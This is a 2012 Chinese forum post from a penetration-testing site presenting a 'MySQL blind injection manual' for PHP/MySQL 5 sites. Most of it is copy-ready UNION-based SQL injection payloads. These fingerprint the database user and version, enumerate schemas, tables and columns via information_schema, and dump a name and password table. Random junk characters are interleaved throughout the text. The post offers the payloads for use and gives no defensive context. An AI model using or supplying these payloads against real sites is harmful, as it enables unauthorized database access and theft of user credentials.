中国网络渗透测试联盟

标题: mysql盲注手册 [打印本页]
作者: admin    时间: 2012-9-13 16:27
标题: mysql盲注手册

/ ^/ A. K- z6 G+ Z教程内容:Mysql 5+php 注入% Q- |2 Y9 c! C$ `1 d
6 a1 F1 ^% g* |; F6 x) ]: E% V) Q+ P3 ~
( g9 H' c' `: l" Y/ y5 [
$ p2 V7 L1 Y- X  ^0 V/ U
一.查看MYSQL基本信息(库名,版本,用户)- S' m& l9 u, _9 {2 \! _

- {  j- l. p) e& d+ T+ B( oand 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*
# R% h" p' [* v# S- b$ C5 r' \" n4 Q1 z6 R# T) n8 P( y2 F
二.查数据库7 k; e# W* g; \: q; ?" [
1 v7 T3 ^# B8 K& F* S- G
and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8  from information_schema.SCHEMATA limit 1,1/*
7 R4 s7 ^. r2 |& t# s2 M( jlimit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。/ I) Q% o% c6 v; G/ y$ I6 r' ~; l& X) M
) A( q* _5 K2 n  N4 P
三.暴表, O4 R: A: u6 u0 ~! Z* N) u% ]3 z

9 {  R# B! }* W/ Gand 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*6 ~6 g+ `% z  u; `1 \
# R  \9 `6 |# I! J$ C
limit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。3 l0 N0 ^4 w" ?# e. H5 Q4 o7 n3 f

6 ~0 L9 s6 C: z; k四.暴字段1 Y) V2 y. H- Q1 p6 y0 Y. Z5 D  l: i
/ s; M) @: a/ P% W  y* I
and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*; @0 L  ^, B+ G# E) y% }. l) x3 ?
0 G% ~4 s  i* D( Y. m. W1 P
limit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。
, l# H7 m& ?) r, b( Z' D( ]% r4 ~- X( C& z8 O# ?# A  B6 K' N
五.暴数据
8 a: b4 B; {2 Y. {+ a% ^- N0 B. Y" f; Q7 y# ~
and 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*2 ]% }; W4 S% K6 ~
$ S) l$ i' i$ `4 k0 @6 v" I

3 b- u4 Y0 ^) |0 F这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。7 r! Y: K  b5 r9 Z9 p( n: n) V




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2